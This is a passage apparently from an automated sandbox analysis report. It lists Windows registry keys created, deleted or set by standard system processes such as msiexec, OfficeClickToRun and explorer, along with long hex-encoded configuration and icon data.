Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2c C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2e C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\TrustCenter\Experimentation C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|13" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Overrides C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "2" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|5" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|9" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\0.10 = 2c205c22446f63756d656e745265636f766572794d736f4872426567696e4d6f646966794472705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225469746c654261725361766555694d616e616765725772697465537461747573546f5469746c654261725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c6f6164437369446c6c466f72436c69636b3252756e456e7669726f6e6d656e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2249735365727665724361636865645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224d616e75616c5361766555736167655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2246696c6553746f72655c22203a207b205c224576656e74735c22203a207b205c22465344436f7272757074696f6e5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c2247617262616765436f6c6c656374696f6e5c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c225a65726f4279746546696c6555706c6f6164417474656d707465645c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d2c205c2252756e74696d6550726f706572746965735c22203a207b205c224576656e74735c22203a207b205c22496e636f6d70617469626c6543736956657273696f6e44657465637465645c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d2c205c224f66666963655c22203a207b205c225375624e616d657370616365735c22203a207b205c2246696c65494f5c22203a207b205c225375624e616d657370616365735c22203a207b205c224353495c22203a207b205c225375624e616d657370616365735c22203a207b205c2253746f726167655c22203a207b205c224576656e74735c22203a207b205c2243616368654f707469637356325c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d207d207d2c205c224d6f6373695c22203a207b205c224576656e74735c22203a207b205c22557064617465486f73745469705c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d207d207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4772617068696373222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c22415243457863657074696f6e53636f70655c22203a207b205c224576656e74466c61675c22203a20353132207d2c205c2245326f5669657752656e646572506572666f726d616e636541637469766974795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224172745669657756616c69646174655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224175746f6669745368617065546f54657874436d645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22546f704c6576656c456666656374447261775c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224372656174654269746d617046726f6d506c6174666f726d4269746d61705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e6b496e70757453757266616365426173655570646174655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2250617468576964656e657246576964656e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2250617468576964656e657246576964656e53696d706c65506174685c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224776697a536d61727441727450726f7065727469657354656c656d657472795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2243726561746544657669636544334431305c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22537065637472655472616e73636f646541637469766974795c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22496e73657274496e646976696475616c4d6f64656c334441637469766974795c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224c6f61646564496d61676550726f706572746965735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22496e736572744d6f64656c334441637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c22537065637472654372656174655363656e6541637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d2c205c224d6f64656c334452656e64657241637469766974795c22203a207b205c224576656e74466c61675c22203a203438383936207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4964656e74697479222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c22456e7375726550726f7669646572496e697465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574506572736f6e50726f66696c6553657475705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224964656e74697479536e617073686f745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657450726f7669646572466f7241757468536368656d655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225472794964656e74697479506172656e744d617463685c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22526f616d696e6750726f7879496e69745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536861726564437265645265667265736846726f6d53746f72655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22526561644f6e6546726f6d43726564656e7469616c4c6973745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22435265616453796e635461736b52756e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22446f6d61696e4a6f696e65644f72436c6f7564446f6d61696e4a6f696e656453657373696f6e735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765744164616c416363657373546f6b656e46726f6d4372656450726f76696465725c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574536572766963655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574436f6e666967546f6b656e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574426c6f636b696e67536572766963655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22506f70756c617465536572766963654d61705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657441757468656e74696361746564536572766963655469636b65745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22526566726573684964656e7469746965735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224765745365727669636555726c466f7246656465726174696f6e50726f7669646572416e616c797369735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c225365727669636555726c5374617475735c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2241637175697265536572766963655469636b6574466f724144414c5c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c2253697465735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e496e736967687473222c20225622203a20227374643a3a77737472696e677c7b205c225375624e616d657370616365735c22203a207b205c22496e73696768747350616e655c22203a207b205c224576656e74735c22203a207b205c22415c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22445c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2248746d6c5072656665746368526571756573745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22535c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436163686546696c654e6f7456616c69645c22203a207b205c224576656e74466c61675c22203a20323536207d207d2c205c225375624e616d657370616365735c22203a207b205c224f66666963655c22203a207b205c224576656e74735c22203a207b205c2253797374656d616c69645c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c22496e7369676874735c22203a207b205c224576656e74735c22203a207b205c22496e73696768747350616e655c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e73696768747350616e65305c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22496e73696768747350616e65725c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2253797374656d5c22203a207b205c224576656e74735c22203a207b205c224163746976697479715c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224163746976697479735c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d207d207d2c205c22536d6172744c6f6f6b75705c22203a207b205c224576656e74735c22203a207b205c22415c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f7079466561747572654761746573315c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22436f7079466561747572654761746573325c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573315c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657446656174757265476174657331305c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657446656174757265476174657331315c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657446656174757265476174657331325c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657446656174757265476174657331335c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2247657446656174757265476174657331355c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573325c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573335c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573345c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573355c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573365c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573375c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573385c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22476574466561747572654761746573395c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224d5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22535c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2248746d6c5072656665746368526571756573745c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c225265667265736843616368656446696c65735c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22446f776e6c6f61645265736f757263655c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2241757468656e7469636174696f6e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22526573756c7447726f7570546f52656e6465725c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2253656e64576562536f636b6574526571756573745c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22576562536f636b657450696e67506f6e674c6174656e63795c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22446961676e6f737469635c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c2238564d65686c6c5c22203a207b205c225375624e616d657370616365735c22203a207b205c22356b69614b3747426b7a505746675c22203a207b205c224576656e74735c22203a207b205c22373139305c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d2c205c22385c22203a207b205c225375624e616d657370616365735c22203a207b205c227a424b387872415553554e52497859484e4b55415c22203a207b205c224576656e74735c22203a207b205c22393133335c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d2c205c224f66666963655c22203a207b205c224576656e74735c22203a207b205c2253797374656d644d617463685c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c22496e7369676874735c22203a207b205c224576656e74735c22203a207b205c22536d6172744c6f6f6b75705c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536d6172744c6f6f6b75705f5f5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536d6172744c6f6f6b75705f5f5f5c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2253797374656d5c22203a207b205c224576656e74735c22203a207b205c2241637469766974795c22203a207b205c224576656e74466c61675c22203a2032207d207d207d2c205c2253797374656d68633863674f6a46515c22203a207b205c224576656e74735c22203a207b205c22383635335c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d207d207d2c205c22556952756e74696d655c22203a207b205c224576656e74735c22203a207b205c22437265617465576562536f636b65745c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2250726f636573735265717565737451756575655c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22496e74656e745365727669636550726f78794f6e436f6e6e656374696f6e436c6f7365645c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224f6e436f6e6e656374696f6e436c6f7365645c22203a207b205c224576656e74466c61675c22203a20323536207d207d207d207d207d22207d2c207b20224622203a20224d6963726f736f66742e4f66666963652e54656c656d6574727944796e616d6963436f6e6669672e4c6963656e73696e67222c20225622203a20227374643a3a77737472696e677c7b205c224576656e74735c22203a207b205c224c6963656e73696e67427573626172416374696f6e5c22203a207b205c224576656e74466c61675c22203a203439343038207d2c205c22487244697370617463685375625461736b53746172745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22517569636b56616c69646174696f6e5c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2253617665416c6c536b75696473546f52656769737472795c22203a207b205c224576656e74466c61675c22203a2032207d2c205c2257616974546f52657472794865617274626561745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c22536561726368466f7253657373696f6e546f6b656e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c224e554c56616c69646174696f6e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2256616c696461746553657373696f6e546f6b656e5c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c2243616e52756e4665617475726543616368655c22203a207b205c224576656e74466c61675c22203a20323536207d2c205c22506572666f726d4c6963656e73696e674e6f74696669636174696f6e735c22203a207b205c224576656e74466c61675c22203a20323536207d207d2c205c225375624e616d657370616365735c22203a207b205c224c5655585c22203a207b205c224576656e74735c22203a207b205c224e6f456e7469746c656d656e74735c22203a207b205c224576656e74466c61675c22203a203439343038207d2c205c224e6f456e7469746c656d656e74734578706572696d656e74547269676765725c22203a207b205c224576656e74466c61675c22203a203439343038207d207d207d2c205c224f6666696365436c69656e744c6963656e73696e675c22203a207b205c224576656e74735c22203a207b205c224c6963656e7365436f6d706c657465645c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c6567616379416374697669747953756363657373436f756e745c22203a207b205c224576656e74466c61675c22203a2032207d2c205c224c656761637941637469766974794661696c757265436f756e745c22203a207b205c224576656e74466c61675c22203a2032207d207d2c205c225375624e616d657370616365735c22203a207b205c22436c69656e745c22203a207b205c224576656e74735c22203a207b205c224653686f756c6441637469766174655c22203a207b205c224576656e74466c61675c22203a2032207d207d207d207d207d2c205c22486561727462 C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|10" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a C:\Windows\system32\msiexec.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\2B C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\Expires = "int64_t|0" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 3a002e8005398e082303024b98265d99428e115f260001002600efbe11000000c71d209b5fbcda01cc442979fec6da011443508efec6da0114000000 C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\bing.com C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com\Total = "2730" C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "1097" C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\8A567BD6FA501A947AD1F646E53EEC14\SourceList\LastUsedSource = "n;1;C:\\ProgramData\\Package Cache\\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}v14.30.30704\\packages\\vcRuntimeAdditional_amd64\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com\ = "1064" C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5040806F8AF9AAC49928419ED5A1D3CA\SourceList C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259} C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "2730" C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\MinPos1280x720x96(1).y = "4294967295" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\SearchHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\WorkFolders C:\Windows\System32\rundll32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:FMTID = "{B725F130-47EF-101A-A5F1-02608C9EEBAC}" C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2198854727-3842442895-2838824242-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\PastIconsStream = 1400000005000000010001000200000014000000494c2006020004002c0010001000ffffffff2110ffffffffffffffff424d360000000000000036000000280000001000000040000000010020000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000ff00000060000000000000000000000020000000b0000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff00000060000000200000000000000020000000f00d0d0df09d9d9dffc8c8c8ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff000000603f3f3f66000000ff00000060000000900a0a0af0c0c0c0ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660e2e2e2ff474747eb000000d0000000e04c4c4cee999999ff939393eeb1b1b1f0e0e0e0ffe5e5e5ffe5e5e5ff8f8f8fff000000ff0000006056565660c8c8c8f7adadadf6858585ff000000ff000000ff737373ff999999ff999999ff999999ff999999ffa0a0a0e8868686ff000000ff000000606d6d6d88aaaaaaebb2b2b2ffb2b2b2ff7a7a7aff000000ff000000ff696969ff999999ff999999ff999999ff999999ff5f5f5fff000000ff0000006045454571b2b2b2ffb2b2b2ffb2b2b2ffa7a7a7ff1b1b1be8000000c0000000b0080808f08f8f8fff999999ff999999ff5f5f5fff000000ff00000060303030607f7f7fff7b7b7bf67e7e7ee2525252e20a0a0af0000000f00000003000000020000000f0101010eb5a5a5af6505050ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff676767ff000000ff000000b000000020000000000000000000000020000000b0000000ff000000ff00000060303030607f7f7fff7f7f7fff7f7f7fff777777ff080808f0000000d0000000000000000000000000000000000000000000000060000000ff00000060000000602c2c2ceb5f5f5fff5f5f5fff3f3f3fee080808f0000000f0000000300000000000000000000000000000000000000000000000a0000000600000000000000050000000b0000000f0000000ff000000f0000000a000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000060000000ff00000060000000000000000000000020000000b0000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff000000ff00000060000000200000000000000020000000f00d0d0df09d9d9dffc8c8c8ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ffe5e5e5ff8f8f8fff000000ff000000603f3f3f66000000ff00000060000000900a0a0af0c0c